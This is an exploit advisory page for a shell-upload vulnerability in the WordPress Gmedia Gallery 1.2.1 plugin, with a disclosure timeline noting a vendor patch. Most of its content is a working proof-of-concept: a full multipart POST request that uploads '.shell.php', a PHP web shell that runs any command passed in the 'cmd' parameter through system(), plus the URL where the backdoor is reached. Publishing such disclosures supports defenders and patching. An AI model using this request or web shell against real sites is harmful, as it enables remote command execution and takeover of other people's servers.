WordPress Gmedia Gallery 1.2.1 Shell Upload

2014.08.03
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

###################### # Exploit Title : Wordpress Gmedia Gallery 1.2.1 Shell Upload Vulnerability # Exploit Author : Claudio Viviani # Vendor Homepage : http://www.codeasily.com/ # Software Link : http://downloads.wordpress.org/plugin/grand-media.zip # Date : 2014-08-01 # Tested on : Windows 7 / Mozilla Firefox ###################### # Description : Any user could upload php files (administrator by default). ###################### # Vulnerability Disclosure Timeline: 2014-08-01: Discovered vulnerability 2014-08-01: Vendor Notification (Twitter) 2014-08-01: Vendor Response/Feedback 2014-08-02: Vendor Fix/Patch 2014-08-02: Public Disclosure ###################### # PoC: POST Host=127.0.0.1 User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding=gzip, deflate Referer=http://127.0.0.1/wordpress/wp-admin/admin.php?page=GrandMedia_AddMedia Content-Length=916 Content-Type=multipart/form-data; boundary=---------------------------304431219031197 Cookie=wordpress_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7Ce7319f78d3d8ab969d8896d72dc8c2da; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_75aacd302e2a4723897cb1d154c13f77=pippo%7C1407087221%7C7d38cc7811b5a07ab22e799069eed6e7; wp-settings-time-1=1406915840 Connection=keep-alive Pragma=no-cache Cache-Control=no-cache POSTDATA =-----------------------------304431219031197 Content-Disposition: form-data; name="name" .shell.php -----------------------------304431219031197 Content-Disposition: form-data; name="chunk" 0 -----------------------------304431219031197 Content-Disposition: form-data; name="chunks" 1 -----------------------------304431219031197 Content-Disposition: form-data; name="params" terms%5Bgmedia_category%5D=&terms%5Bgmedia_album%5D=&terms%5Bgmedia_tag%5D= -----------------------------304431219031197 Content-Disposition: form-data; name="file"; filename=".shell.php" Content-Type: application/octet-stream <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> -----------------------------304431219031197-- Backdoor location: http://127.0.0.1/wordpress/wp-content/grand-media/application/.shell.php?cmd=pwd ##################### Discovered By : Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ #####################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top